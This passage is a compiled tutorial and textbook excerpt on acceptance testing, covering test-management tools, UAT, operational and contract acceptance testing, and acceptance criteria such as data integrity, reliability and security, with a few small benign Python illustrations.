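assert not failures, f"deployment failures: {failures}"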


SOFTWARE TOOLS: Test Planning and Management

Objective: These tools assist a software team in planning the testing strategy that is chosen and managing the testing process as it is conducted.

Mechanics: Tools in this category address test planning, test storage, management and control, requirements traceability, integration, error tracking, and report generation. Project managers use them to supplement project scheduling tools. Testers use these tools to plan testing activities and to control the flow of information as the testing process proceeds.

Representative Tools:

• QaTraq Test Case Management Tool, developed by Traq Software (www.testmanagement.com), "encourages a structured approach to test management."
• QADirector, developed by Compuware Corp. (www.compuware.com/qacenter), provides a single point of control for managing all phases of the testing process.
• TestWorks, developed by Software Research, Inc. (www.soft.com/Products/index.html), contains a fully integrated suite of testing tools including tools for test management and reporting.
• OpensourceTesting.org (www.opensourcetesting.org/testmgt.php) lists a variety of open-source test management and planning tools.
• NI TestStand, developed by National Instruments Corp. (www.ni.com), allows you to "develop, manage, and execute test sequences written in any programming language."

(Tools noted here do not represent an endorsement, but rather a sampling of tools in this category. In most cases, tool names are trademarked by their respective developers.)


acceptance testing

What is Acceptance Testing?

Acceptance testing is a testing technique performed to determine whether or not the software system has met the requirement specifications. The main purpose of this test is to evaluate the system's compliance with the business requirements and verify whether it has met the required criteria for delivery to end users.

There are various forms of acceptance testing:

• User Acceptance Testing
• Business Acceptance Testing
• Alpha Testing
• Beta Testing

Acceptance Testing - In SDLC

The following diagram explains the fitment of acceptance testing in the software development life cycle.


DEFINITION

Acceptance Testing is a level of the software testing process where a system is tested for acceptability.

The purpose of this test is to evaluate the system’s compliance with the business requirements and assess whether it is acceptable for delivery.

When is it performed?

Acceptance Testing is performed after System Testing and before making the system available for actual use.

Who performs it?

• Internal Acceptance Testing (Also known as Alpha Testing) is performed by members of the organization that developed the software but who are not directly involved in the project (Development or Testing). Usually, it is the members of Product Management, Sales and/or Customer Support.

• External Acceptance Testing is performed by people who are not employees of the organization that developed the software.

o Customer Acceptance Testing is performed by the customers of the organization that developed the software. They are the ones who asked the organization to develop the software for them. [This is in the case of the software not being owned by the organization that developed it.]

o User Acceptance Testing (Also known as Beta Testing) is performed by the end users of the software. They can be the customers themselves or the customers’ customers.


TASKS

• Acceptance Test Plan
  o Prepare
  o Review
  o Rework
  o Baseline
• Acceptance Test Cases/Checklist
  o Prepare
  o Review
  o Rework
  o Baseline
• Acceptance Test
  o Perform

The acceptance test cases are executed against the test data or using an acceptance test script and then the results are compared with the expected ones.

Definition by ISTQB

• acceptance testing: Formal testing with respect to user needs, requirements, and business processes conducted to determine whether or not a system satisfies the acceptance criteria and to enable the user, customers or other authorized entity to determine whether or not to accept the system.

Acceptance Criteria

Acceptance criteria are defined on the basis of the following attributes:

• Functional Correctness and Completeness
• Data Integrity
• Data Conversion
• Usability
• Performance
• Timeliness
• Confidentiality and Availability
• Installability and Upgradability
• Scalability
• Documentation

Acceptance Test Plan - Attributes

The acceptance test activities are carried out in phases. First, the basic tests are executed, and if the test results are satisfactory, more complex scenarios are then executed.


The Acceptance test plan has the following attributes:

• Introduction
• Acceptance Test Category
• Operation Environment
• Test Case ID
• Test Title
• Test Objective
• Test Procedure
• Test Schedule
• Resources

The acceptance test activities are designed to reach one of the following conclusions:

1. Accept the system as delivered
2. Accept the system after the requested modifications have been made
3. Do not accept the system

Acceptance Test Report - Attributes

The Acceptance test Report has the following attributes:

• Report Identifier
• Summary of Results
• Variations
• Recommendations
• Summary of To-Do List
• Approval Decision

After the system test has corrected all or most defects, the system will be delivered to the user or customer for acceptance testing. Acceptance testing is basically done by the user or customer, although other stakeholders may be involved as well. The goal of acceptance testing is to establish confidence in the system. Acceptance testing is most often focused on validation-type testing. Acceptance testing may occur at more than just a single level, for example:

• A Commercial Off the shelf (COTS) software product may be acceptance tested when it is installed or integrated.

• Acceptance testing of the usability of the component may be done during component testing.

• Acceptance testing of a new functional enhancement may come before system testing.

The types of acceptance testing are:


• The User Acceptance test focuses mainly on the functionality, thereby validating the fitness-for-use of the system by the business user. The user acceptance test is performed by the users and application managers.

• The Operational Acceptance test, also known as the Production acceptance test, validates whether the system meets the requirements for operation. In most organizations, the operational acceptance test is performed by the system administrators before the system is released. It may include testing of backup/restore, disaster recovery, maintenance tasks, and periodic checks of security vulnerabilities.

• Contract Acceptance testing is performed against the contract's acceptance criteria for producing custom-developed software. Acceptance should be formally defined when the contract is agreed.

• Compliance acceptance testing, also known as regulation acceptance testing, is performed against the regulations that must be adhered to, such as governmental, legal, or safety regulations.

• Alpha and beta testing: Alpha testing takes place at developers' sites, and involves testing of the operational system by internal staff, before it is released to external customers. Beta testing takes place at customers' sites, and involves testing by a group of customers who use the system at their own locations and provide feedback, before the system is released to other customers. The latter is often called "field testing".

Alpha testing mostly applies to software developed for the mass market, i.e., commercial off-the-shelf (COTS) software, where feedback is needed from potential users. Alpha testing is conducted at the developer's site: potential users and members of the developer's organization are invited to use the system and report defects. Beta testing, also known as field testing, is done by potential or existing users/customers at an external site without the developers' involvement; this test determines whether the software satisfies the end users'/customers' needs and also acquires feedback from the market.

Acceptance testing is performed after system testing is done and all or most of the major defects have been fixed. The goal of acceptance testing is to establish confidence that the delivered software/system meets the end users'/customers' requirements and is fit for use. Acceptance testing is done by the user/customer and some of the project stakeholders.

Acceptance testing is done in a production-like environment.

1. User Acceptance Testing

What is User Acceptance Testing?

User acceptance testing is the software testing process in which the system is tested for acceptability and the end-to-end business flow is validated. This type of testing is executed by the client in a separate environment (similar to the production environment) to confirm whether the system meets the requirements of the requirement specification.


UAT is performed after system testing is done and all or most of the major defects have been fixed. It is conducted in the final stage of the software development life cycle (SDLC), prior to the system being delivered to a live environment. UAT users or end users concentrate on end-to-end scenarios, typically by running a suite of tests on the completed system.

Acceptance tests are "black box" tests: UAT users are not aware of the internal structure of the code; they just specify the input to the system and check whether the system responds with the correct result.

User acceptance testing is also known as customer acceptance testing (CAT) if the system is being built or developed by an external supplier. The CAT or UAT is the final confirmation from the client before the system is ready for production. The business customers are the primary owners of these UAT tests. The tests are created by business customers and articulated in business domain language, so ideally it is a collaboration between business customers, business analysts, testers, and developers. It consists of test suites that involve multiple test cases, and each test case contains input data (if required) as well as the expected output. The result of a test case is either a pass or a fail.

Need of User Acceptance Testing:

Once software has undergone unit, integration, and system testing, the need for acceptance testing may seem redundant. But acceptance testing is required because:

1) Developers code the software based on the requirements document, which reflects their "own" understanding of the requirements and may not actually be what the client needs from the software.

2) Requirements changes during the course of the project may not be communicated effectively to the developers.

What to Test in User Acceptance Testing?

• Test cases are created based on the use cases from the requirements definition stage.

• Test cases are also created considering real-world scenarios for the application.

• The actual testing is carried out in an environment that is a copy of the production environment, so this type of testing concentrates on the exact real-world use of the application.

• Test cases are designed so that all areas of the application are covered during testing, to ensure effective user acceptance testing.


What are the key deliverable of User Acceptance Testing?

The completion of user acceptance testing is a significant milestone for the traditional testing method. The following are the key deliverables of the user acceptance testing phase:

• Test Plan: outlines the testing strategy.
• UAT Test Cases: help the team test the application effectively in the UAT environment.
• Test Results and Error Reports: a log of all the test cases executed and the actual results.
• User Acceptance Sign-off: confirmation that the system, documentation, and training materials have passed all tests within acceptable margins.
• Installation Instructions: a document that helps install the system in the production environment.
• Documentation Materials: tested and updated user documentation and training materials, finalized during user acceptance testing.

UAT directly involves the intended users of the software. UAT can be implemented by making software available for a free beta trial on the Internet or through an in-house testing team comprised of actual software users. Following are the steps involved in in-house UAT:

• Planning: The UAT strategy is outlined during the planning step.

• Designing test cases: Test cases are designed to cover all the functional scenarios of the software in real-world usage. They are designed in a simple language and manner to make the test process easier for the testers.

• Selection of testing team: The testing team is comprised of real world end-users.

• Executing test cases and documenting: The testing team executes the designed test cases. Sometimes it also executes some relevant random tests. All bugs are logged in a testing document with relevant comments.

• Bug fixing: Responding to the bugs found by the testing team, the software development team makes final adjustments to the code to make the software bug-free.


• Sign-off: When all bugs have been fixed, the testing team indicates acceptance of the software application. This shows that the application meets user requirements and is ready to be rolled out in the market.

UAT is important because it helps demonstrate that required business functions are operating in a manner suited to real-world circumstances and usage.

2. Operational Acceptance Testing


The purpose of OAT is to prove the aspects of the system that do not affect the functionality but can still have a profound effect on how it is managed and supported. OAT concentrates on areas such as resiliency, recoverability, integrity, manageability and supportability, with the specific exclusions of Performance, Security and Disaster Recovery, which are areas of speciality in their own right. The required level of OAT is determined by using CDRM (Change Driven Risk Management) and the output from this will recommend the risk mitigation strategy for all phases of the project. This will enable the OAT phase to focus on mitigating the operational risks.

The following mitigation methods form the OAT phase:

• Backup & Recovery
• Change Implementation
• Change Back-out
• Component Failure
• Shutdown & Resumption
• Operational Support & Procedure
• Alerts

All methods must be performed based on the CDRM technique and TS standards in a managed non-functional test environment that is an accurate reflection of production.


Categories of OAT

Backup & Recovery
To prove both the backup and recovery processes. The testing will prove the operation, operability, and integrity of backup procedures to ensure that the operating systems and data can be restored successfully at the same site and also at another site if applicable. The recovery testing includes the build and configuration of a component. These tests will ensure build quality and guarantee that subsequent builds of components are to the same standard.

The testing should prove that:

• Service can be restored to an agreed recovery point utilising appropriate TS standard backup and restore methods.

• Backups taken at one site can be recovered to the same site.

• Backups taken at one site can be recovered to another site.

Change Implementation
To prove that the implementation into the production environment will be successful and not adversely affect the existing production services.

The testing should prove that:

• The implementation into the live production environment will not adversely affect the integrity of the current production services.

• The implementation process can be replicated by using valid documentation that includes the time required for each step and the order of implementation.

Change Back-out To prove the back-out of a failed change from the production environment will be successful and will not adversely affect existing production services.

The testing should prove that:

• All the required steps to successfully back out a change are valid.

• The time required for each step of the back-out is known and documented.


Component Failure To prove that the infrastructure has been designed to cope with unplanned outages. Following failure and repair, the failed components should be able to be recovered into the infrastructure in line with TS Recovery Management processes and timescales.

The testing should prove that:

• The service can continue after the failure of individual components (outside its core operating environment), while issuing appropriate error messages. The system should be designed to offer transparent failover where possible and upon terminal error on the active platform (usually identified by a heartbeat failure), the failover infrastructure should be automatically activated. Ultimately, this covers the ability to continue operation at an alternative facility after the failure at the primary facility. This should be proven for new and amended components.

• The system can automatically adjust itself to the availability of system resources.

• If fail-over is invoked, fail-back can be performed successfully and recovery to the original state is achievable. When component failures are resolved the service should fully recover itself with no customer impact. Any non-automated actions should be documented.

• If several components have been affected by a failure, there should be a proven plan showing the recommended order of restart, time to complete, etc.

• Failure to complete a unit of work does not result in data corruption or inconsistency and all services must handle any failures while preserving data integrity.

• Any impact on the E2E service by the failure of individual components is understood and documented.

Shutdown & Resumption To prove that the system can be shutdown and restarted cleanly without service disruption or within an agreed window of scheduled downtime.

The testing should prove that:

• Each component can be shutdown and resumed successfully within the agreed time scale.

• The order of resumption of the components, if applicable, is valid and documented.


Operational Support & Procedure To prove that all components of a service are capable of being supported to TS standards. The testing should prove that:

• Diagnostic information produced in failure situations is of sufficient quality to support any manual or, ideally, automatic corrective actions.

• Any recovery documentation produced or amended, including Service Diagrams, is valid. This should be handed over to the relevant support areas.

• Documentation for each element which covers restart / recovery, error conditions, alerts, etc. must be provided.

• Full remote control capability to resolve error conditions should be proven for all new components and tools.

• Maintenance of the components should be able to be performed without disruption to the service or within an agreed outage as per the SLA. The service should be able to be started, shutdown and controlled to support maintenance.

Alerts To prove that alerts are raised in the event of a component failure, error condition or if a threshold is breached.

The testing should prove that:

• Event Monitoring - All critical alerts go to the TEC and reference the correct resolution document. Any system that fails at an infrastructure or application level alerts on failure or is addressed by Heartbeat functionality.

• Threshold Monitoring - Alerts are in place and issued if agreed thresholds are exceeded, e.g., disk utilisation, CPU, memory.

• Heartbeat Monitoring (End to End) - This mimics customer experience on a regular basis. An alert will be issued if response times fall below a predetermined (by the business) threshold or fail an agreed number of times consecutively. The object of the heartbeat is to prove that key business functionality is available and performing to an acceptable standard. If end-to-end heartbeat is not appropriate, then component heartbeats should be applied.
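As a concrete illustration of threshold monitoring, the sketch below polls basic host metrics and raises an alert when an agreed limit is breached. It assumes the third-party psutil package is available; the thresholds and the print-based alert hook stand in for a real event console feed such as the TEC mentioned above.

# Illustrative threshold-monitoring check; thresholds are hypothetical.
import psutil  # third-party package, assumed installed

THRESHOLDS = {"cpu_percent": 85.0, "memory_percent": 90.0, "disk_percent": 90.0}

def raise_alert(metric: str, value: float, limit: float) -> None:
    # In a real OAT environment this would feed the event console.
    print(f"ALERT: {metric}={value:.1f}% exceeds threshold {limit:.1f}%")

def check_thresholds() -> None:
    readings = {
        "cpu_percent": psutil.cpu_percent(interval=1),
        "memory_percent": psutil.virtual_memory().percent,
        "disk_percent": psutil.disk_usage("/").percent,
    }
    for metric, value in readings.items():
        limit = THRESHOLDS[metric]
        if value > limit:
            raise_alert(metric, value, limit)

if __name__ == "__main__":
    check_thresholds()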


3. Contract Acceptance Testing

Contract acceptance testing can take place either before a service goes live, or after it has been live for a pre-determined period. The tests demonstrate that the supplier has met the stated requirements of the contract. Normally, payment is linked to successfully passing the acceptance tests.

When conducted after a service is live, the contract usually references a service level agreement (SLA), which describes the service delivered rather than the mechanism by which the service is delivered.


Acceptance Testing

14.1 TYPES OF ACCEPTANCE TESTING

A product is ready to be delivered to the customer after the system test group is satisfied with the product by performing system-level tests. Customers execute acceptance tests based on their expectations from the product. The services offered by a software product may be used by millions of users. For example, the service provider of a cellular phone network is a customer of the software systems running the phone network, whereas the general public forms the user base by subscribing to the phone services. It is not uncommon for someone to have a dual role as a customer and a user. The service provider needs to ensure that the product meets certain criteria before the provider makes the services available to the general public. Acceptance testing is a formal testing conducted to determine whether a system satisfies its acceptance criteria—the criteria the system must satisfy to be accepted by the customer. It helps the customer to determine whether or not to accept the system [1]. The customer generally reserves the right to refuse to take delivery of the product if the acceptance test cases do not pass. There are two categories of acceptance testing:

• User acceptance testing.

• Business acceptance testing.

The UAT is conducted by the customer to ensure that the system satisfies the contractual acceptance criteria before being signed off as meeting user needs. Actual planning and execution of the acceptance tests do not have to be undertaken directly by the customer. Often third-party consulting firms offer their services to do this task. However, the customer must specify the acceptance criteria for the third party to seek in the product. The BAT is undertaken within the development organization of the supplier to ensure that the system will eventually pass the UAT. It is a rehearsal of the UAT at the premises of the supplier. The development organization of the supplier derives and executes test cases from the client's contract, which include the acceptance criteria.

The acceptance criteria must be defined and agreed upon between the supplier and the customer to avoid any kind of protracted arguments. Either party or a third-party consulting firm may design the acceptance test plan. The acceptance criteria document is a part of the contract in the case of an outsourced development under the OEM agreement. If some hardware is an integral part of the system, then the hardware acceptance criteria are included in the contractual agreement. In general, the marketing organization of the buyer defines the acceptance criteria. However, it is important that the software quality assurance team of the buyer's organization initiate a dialogue with the seller and provide a set of "straw man" acceptance criteria for the marketing department to review and react to. The users, the system engineers, customer support engineers, and the software quality assurance group of the buyer's organization do the actual planning and execution of the acceptance tests after the criteria are agreed upon. The personnel developing an acceptance test plan must have a thorough understanding of the acceptance criteria that have been agreed upon. It is unlikely that the system passes all the acceptance criteria in one go for large, complex systems. It is useful to focus on the following three major objectives of acceptance testing for pragmatic reasons:

• Confirm that the system meets the agreed-upon criteria. The broad categories of criteria are explained in Section 14.2.

• Identify and resolve discrepancies, if there are any. The sources of discrepancies and mechanisms for resolving them have been explained in Section 14.5.

• Determine the readiness of the system for cut-over to live operations. The final acceptance of a system for deployment is conditioned upon the outcome of the acceptance testing. The acceptance test team produces an acceptance test report which outlines the acceptance conditions. The details of an acceptance test report have been explained in Section 14.6.

Acceptance testing is only one aspect of the contractual fulfillment of the agreement between a supplier and a buyer. A contractual agreement may require the seller to provide other materials, such as the design solution document that addresses the requirement document of the buyer. The acceptance test team may evaluate the acceptability of the system design in terms of graphical user interface, error handling, and access control.

14.2 ACCEPTANCE CRITERIA

At the core of any contractual agreement is a set of acceptance criteria. A key question is what criteria must the system meet in order to be acceptable? The acceptance criteria must be measurable and, preferably, quantifiable. The basic principle of designing the acceptance criteria is to ensure that the quality of the system is acceptable. One must understand the meaning of the quality of a system, which is a complex concept. It means different things to different people, and it is highly context dependent [2].

Even though different persons may have a different view about quality, it is the customer's opinion that prevails. The concept of quality is, in fact, complex and multifaceted [3]. Five views of quality, namely, the transcendental view, user view, manufacturing view, product view, and value-based view, have been explained in Chapter 17. The five views were originally presented by Garvin [3] in the context of production and manufacturing in general and subsequently explained by Kitchenham and Pfleeger [2] in a software development context. The five views are presented below in a concise form:

1. The transcendental view sees quality as something that can be recognized but is difficult to describe or define.

2. The user view sees quality as satisfying the purpose.

3. The manufacturing view sees quality as conforming to the specification.

4. The product view ties quality with the inherent characteristics of the product.

5. The value-based view puts a cost figure on quality—the amount a customer is willing to pay for it.

Acceptance criteria are defined on the basis of these multiple facets of quality attributes. These attributes determine the presence or absence of quality in a system. Buyers, or customers, should think through the relevance and relative importance of these attributes in their unique situation at the time of formulating the acceptance criteria. The attributes of quality are discussed below, and examples of acceptance criteria for each quality attribute are given.

Functional Correctness and Completeness One can ask the question: Does the system do what we want it to do? All the features which are described in the requirements specification must be present in the delivered system. It is important to show that the system works correctly under at least two to three conditions for each feature as a part of acceptance.

One can show the functional correctness of a system by using the requirements database, as discussed in Chapter 11. The database is used in generating a requirement traceability matrix during system-level testing. Basically, a traceability matrix tells us the test cases that are used to verify a requirement and all the requirements that are partially verified by a test case. Such a traceability matrix is a powerful tool in showing the customer the functional correctness of the system. It is important to obtain early feedback from the customer on the requirements traceability matrix. The idea behind the feedback is to reach an agreement on the validation method to be employed for each requirement. The decision is especially significant because some validation methods are easier to implement and less time intensive than other methods. For example, the demonstration method is less time intensive than the testing method.

In reality, rigorous functional correctness testing is conducted during the system testing phase, rather than during acceptance testing. However, the buyer may ask for the requirement traceability matrix before the start of acceptance testing to ensure that the system does function according to the requirement specification.
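The following sketch illustrates the idea of a requirements traceability matrix in a few lines of Python. The requirement and test case identifiers are invented for illustration; a real matrix would be generated from the requirements database.

# Sketch of a traceability matrix: invert test->requirements into
# requirement->tests, and flag requirements no test verifies.
from collections import defaultdict

# Each test case lists the requirements it (partially) verifies.
TEST_TO_REQS = {
    "TC-001": ["REQ-01", "REQ-02"],
    "TC-002": ["REQ-02"],
    "TC-003": ["REQ-03"],
}

def build_traceability_matrix(test_to_reqs):
    """Invert the mapping: requirement -> test cases that verify it."""
    matrix = defaultdict(list)
    for test_id, reqs in test_to_reqs.items():
        for req in reqs:
            matrix[req].append(test_id)
    return dict(matrix)

def uncovered_requirements(all_reqs, matrix):
    """Requirements with no verifying test case: gaps to flag before sign-off."""
    return [r for r in all_reqs if r not in matrix]

matrix = build_traceability_matrix(TEST_TO_REQS)
print(matrix)
print(uncovered_requirements(["REQ-01", "REQ-02", "REQ-03", "REQ-04"], matrix))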

Accuracy The question is: Does the system provide correct results? Accuracy measures the extent to which a computed value stays close to the expected value. Accuracy is generally defined in terms of the magnitude of the error. A small gap—also called an error in numerical analysis, for example—between the actual value computed by a system and the expected value is generally tolerated in a continuous space. The accuracy problem is different in discrete space, leading to false-positive and false-negative results. False positives and false negatives are serious drawbacks in any diagnostic and monitoring software tools.
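For accuracy criteria in a continuous space, a tolerance-based comparison is the usual mechanism. The sketch below uses Python's math.isclose with illustrative tolerances; in practice the agreed error bound would come from the acceptance criteria themselves.

# Tolerance-based accuracy check; the tolerances are illustrative.
import math

expected = 100.0
computed = 100.0004

# Accept the computed value if the error magnitude is within the agreed bound.
acceptable = math.isclose(computed, expected, rel_tol=1e-5, abs_tol=1e-3)
print(acceptable)  # True: |error| = 0.0004 is within tolerance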

Data Integrity Data integrity refers to the preservation of the data while it is transmitted or stored, such that the value of the data remains unchanged when the corresponding receive or retrieve operations are executed at a later time. Thus, data must not be compromised by performing update, restore, retrieve, transmit, and receive operations. The requirement of data integrity is included in the acceptance test criteria to uncover design flaws that may result in data corruption. In communication systems, an intruder can change the data without the sender and receiver detecting the change. If integrity check mechanisms are in place, the data may be changed, but the mechanism will detect the tampering. Data integrity mechanisms detect changes in a data set. The concepts of message digest and digital signature are used in preserving data integrity [4].

Remark. A message digest algorithm takes in an input message of arbitrary length and produces a fixed-length code. The fixed-length code is called a digest of the original message. The commonly used message digest algorithms are Message Digest 5 (MD5) and the Secure Hash Algorithms 1 and 2 (SHA-1 and SHA-2).

Remark. A digital signature is an encrypted message digest that is appended to a document to be stored or transmitted. A message digest is obtained by using, for example, the MD5, SHA-1, or SHA-2 algorithm. The message digest is encrypted with the private key of the party that stores or transmits the message.
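The sketch below illustrates these integrity mechanisms using Python's standard hashlib and hmac modules. A keyed digest (HMAC) stands in here for a full public-key digital signature, and the message and key are invented for illustration.

# Message digest and keyed-digest integrity check (HMAC in place of a
# public-key signature for brevity).
import hashlib
import hmac

message = b"transfer $100 to account 42"

# A fixed-length digest of the arbitrary-length message (SHA-256 shown).
digest = hashlib.sha256(message).hexdigest()

# A keyed digest (HMAC): tampering is detectable without revealing the key.
key = b"shared-secret"
tag = hmac.new(key, message, hashlib.sha256).hexdigest()

tampered = b"transfer $900 to account 42"
print(hashlib.sha256(tampered).hexdigest() == digest)  # False: digest changed
print(hmac.compare_digest(
    hmac.new(key, tampered, hashlib.sha256).hexdigest(), tag))  # False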

Data Conversion Data conversion is the conversion of one form of computer data to another, for example, conversion of a file from one version of Microsoft Word to an earlier version for the sake of those who do not have the latest version of Word installed. Data conversion testing is testing of programs or procedures that are used to convert data from existing systems for use in replacement systems. If this is not performed properly, data may be converted into an invalid format that cannot be processed by the new system; thus the data will have no value. In addition, data may be omitted from the conversion process, resulting in gaps or system errors in the new system. Inability to process backup or archive files results in the inability to restore or interrogate old data.

An acceptance criterion for data conversion measures and reports the capability of the software to convert existing application data to new formats. The following questions must be answered in specifying the data conversion acceptance criteria:

• How can we undo a conversion and roll back to the earlier database version(s) if necessary?

• How much human involvement is needed to validate the conversion results?

• How are the current data being used, and how will the converted data be used?

• Will the data conversion software conduct integrity checking as well?

Backup and Recovery Backup and recovery of data are default functionalities of large, complex systems. This is because, though systems are not expected to crash, in reality a system crash is not uncommon. The backup and recovery acceptance criteria specify the durability and recoverability levels of the software on each hardware platform. The aim of the recovery acceptance test criteria is to outline the extent to which data can be recovered after a system crash. The following questions must be answered in specifying the recoverability acceptance criteria:

• How much data can be recovered after a crash and how?

• Is the recovered data expected to be consistent?

Generally, a system cannot recover from a crash unless the data have been previously backed up. The backup process includes taking periodic snapshots of a state of the system and saving them in stable storage to be retrieved later [5]. The following questions must be answered in specifying the backup acceptance criteria:

• How frequently is the backup process initiated?

• How long does the backup process take?

• Is the backup expected to work on-line or off-line, with normal operation suspended during backup?

• Does the backup process check whether sufficient storage space is available to accommodate all the data?

• Is the backup process fully automated?

Competitive Edge The system must provide a distinct advantage over existing methods and competing products through innovative features. An analysis of the competitiveness of the product is provided to the buyer. This document contains a comparative study of the system with products available in the market from other vendors. A competitive analysis is conducted by the systems engineering group of the marketing organization. The following questions need to be answered in specifying the competitive analysis report acceptance criteria:

• What are the nearest direct competitors of the product?

• What are the indirect competitors of the product?

• Who are the potential competitors?

• Is the business in the product area steady, growing, or declining?

• What can be learned from product operations or from advertisements of competitors?

• What are the strengths and weaknesses of competitors?

• How do their products differ from the product being developed?

Usability The question is: How easy is it to use the system, and how easy is it to learn? The goal of the usability acceptance criteria is to ensure that the system is flexible, that it is easy to configure and customize, that on-line help and work-arounds are available, and that the user interface is friendly. The following questions need to be addressed in specifying the usability acceptance criteria:

• How will the system help the user in the day-to-day job?

• Will the productivity, customer satisfaction, reliability, and quality of work life of the user improve by using the system?

• Are the menus, commands, screens, and on-line help clear to a typical user?

• Are the user procedures simple, logical, and clear to the typical user?

• Is the user guide clear, easy to access, and understandable for a typical user?

• Will the methods of error and exception handling utilized by the system increase reliability and productivity?

• Are the reports generated by the system in order, consistent, and clear?

• Is the system easy to install?

Performance The desired performance characteristics of the system must be defined for the measured data to be useful. The following questions relate to specification of the performance acceptance criteria:

• What types of performance characteristics of the system need to be measured?

• What is the acceptable value for each performance parameter?

• With what external data source or system does the application interact?

• What kind of workload should be used while running the performance tests? The workload should be representative of the likely real-world operating condition in terms of low load, average load, and peak load.


• Is it required to perform a before-and-after comparison of the performance results with the prior version of the system?

Start-Up Time The system start-up time reflects the time taken to boot up and become operational. The following questions address the start-up acceptance criteria:

• How is the start-up time defined?

• Does the start-up time include the power-on self-test of all the system hardware?

• What is the longest acceptable start-up time?

Stress The system should be capable of handling an extremely high or stressful load. It is necessary to identify the system limitations and then stress the system to find the results when the system is pushed to the border and beyond. The system limitations must be identified in the acceptance criteria. The following questions must be addressed in specifying the stress acceptance criteria:

• What are the design limits of the system?

• What is the expected and acceptable behavior of the recovery mechanism?

• What test environment, close to the customer deployment architecture, is needed in order to force the system to be stressed?

Reliability and Availability Software reliability is defined as the probability that the software executes without failure for a specified amount of time in a specified environment. The longer a system runs without failure, the more reliable it is. A large number of reliability models are available to predict the reliability of software. A software reliability model provides a family of growth curves that describe the decline of the failure rate as defects are submitted and closed during the system testing phase. The failure rate is often calculated in terms of the mean time between failures (MTBF). A growth model can answer the following questions, which can be part of the reliability acceptance criteria:

• What is the current failure rate of the software?

• What will be the failure rate if the customer continues acceptance testing for a long time?

• How many defects are likely to be in the software?

• How much testing has to be performed to reach a particular failure rate?

The failure rate goal that is acceptable must be set separately for each level of problem severity—from critical to low. A customer may be willing to tolerate tens of low-severity issues per day but not more than one critical problem in a year.
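As a worked example of such a criterion, the sketch below computes the MTBF and failure rate from a handful of invented uptime observations and checks them against an illustrative one-critical-failure-per-year threshold.

# Back-of-the-envelope failure-rate calculation; the numbers are made up.
uptime_hours = [310.0, 150.0, 480.0, 260.0]   # runs between observed failures

failures = len(uptime_hours)
mtbf = sum(uptime_hours) / failures            # mean time between failures
failure_rate = 1.0 / mtbf                      # failures per hour

print(f"MTBF: {mtbf:.1f} hours")               # 300.0 hours
print(f"Failure rate: {failure_rate:.5f} failures/hour")

# Example criterion: accept only if the critical failure rate stays below
# one per year (roughly 1/8760 per hour).
print(failure_rate < 1 / 8760)                 # False for this sample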

System availability consists of proactive methods for maximizing service uptime, minimizing downtime, and minimizing the time needed to recover from an outage. Downtime is measured in terms of the mean time to repair (MTTR). The creation of a customer environment is facilitated by gathering an operational profile from the customer. An operational profile describes the ways the system is to be used. One can uncover several deficiencies in the system while tuning its parameters; parameter tuning will improve the system availability level. Customers must be willing to share the operational profile of their computing environment, which may be proprietary information, to improve the target availability level.

Maintainability and Serviceability The maintainability of a system is its ability to undergo repair and evolution. One way to characterize maintainability is to measure the MTTR, which reflects the time it takes to analyze a corrective defect, design a modification, implement the change, test it, and distribute it. The important factor, from a customer's perspective, is the responsiveness of the service rather than the internal technical maintainability of the system. The following are useful acceptance criteria from a customer's perspective:

• The customer is the final arbiter of setting the severity of a system problem. If the customer calls a problem critical, it must be fixed immediately.

• If a system problem is assessed as critical by the customer, then staff must be assigned to work on resolving the problem immediately and with utmost priority.

• If the severity of a system problem is assessed as high by the customer, then staff must be assigned to work on resolving the problem during normal business hours until it is resolved or until a work-around has been delivered as an interim solution. The staff responsible for resolving the problem must ensure that there is significant effort made toward resolving the problem. However, they may spend time on other activities as priorities dictate.

• If a system problem is assessed as low by the customer, then staff must be assigned to work on resolving the problem during normal business hours as time permits. If the problem solution involves a software change, it will normally wait until the next software release to provide the resolution.

• All the critical- and high-severity fixes must work 100% when installed.

Serviceability is closely related to maintainability. Serviceability criteria are designed to ensure the correctness of the tools that are used to diagnose and service the system. For example, the software may need to be serviced remotely via an Internet connection. Diagnostic utilities are used to monitor the operation and the cause of any malfunction. The following questions must be addressed in specifying the serviceability acceptance criteria:

• What kind of tools will be available for servicing the system?

• How should these tools be used?


Robustness The robustness of a system is defined as its ability to recover from errors, continue to operate under worst-case conditions, and operate reliably for an extended period of time. The following questions must be addressed in specifying the robustness acceptance criteria:

• What are the types of errors from which the system is expected to recover?

• What are the causes, or sources, of the errors, so that these can be simulated in a test environment?

• How are the errors initiated, or triggered, in the real world?

• What types of corrective and recovery actions are required for each type of error?

• What kinds of disasters can strike? What are those scenarios?

• What is an acceptable response to each of these identified scenarios?

• What is the recovery mechanism for each of the scenarios? Is it workable, understood, and accepted?

• How can disaster be simulated in order to test recovery?

Timeliness Time to market is an important aspect of any contractual agreement. The supplier must be able to deliver the system to the buyer within the time frame agreed upon. Rewards and penalties are associated with the timeliness acceptance criteria, for example, as follows:

• If coding is completed on time, the buyer will reward 5% extra money on top of the contractual agreement.

• If system-level testing is completed on time, the buyer will reward 10% extra money on top of the contractual agreement.

• For every week of delay in completing the system tests, the supplier has to pay a 2% penalty on top of the contractual agreement, with a maximum of 20% penalty.

Confidentiality and Availability The confidentiality acceptance criteria refer to the requirement that the data must be protected from unauthorized disclosure, and the availability acceptance criteria to the requirement that the data must be protected from a denial of service (DoS) to authorized users. Different types of possible confidentiality and availability acceptance criteria are as follows:

• No unauthorized access to the system is permitted, that is, user authentication is performed.

• Files and other data are protected from unauthorized access.

• The system is protected against virus, worm, and bot attacks.

• Tools are available for detecting attacks.

• There is support against DoS attack.

• Privacy in communication is achieved by using encryption.


• All the customer data must be stored in a secure place in accordance with the policies of customer rights, such as confidentiality.

Remark. A worm is defined as a software component that is capable of, under its own means, infecting a computer system in an automated fashion. On the other hand, a virus spreads rapidly to a large number of computers. However, it cannot do so with its own capability; it spreads using the assistance of another program.

Remark. A bot is a software agent. A bot interacts with other network services intended for people as if it were a person. One typical use of bots is to gather information. Another, more malicious use for bots is the coordination and operation of an automated attack on networked computers, such as a distributed DoS attack.

Compatibility and Interoperability The compatibility of a system is defined as the ability to operate in the same way across different platforms and network configurations and in the presence of different mixes of other applications. On the other hand, the interoperability of a system is defined as the ability to interface with other network elements and work correctly as expected. The major challenge is in determining the platforms, configurations, and other applications with which the system is compatible. The following questions must be addressed in specifying the compatibility and interoperability acceptance criteria:

• What are the platforms, or configurations, on which the system must operate?

• Does the system have to work exactly the same way across different configurations? If not, what are the acceptable variations?

• What are the applications that must coexist with the system?

• With what network elements must the system interoperate?

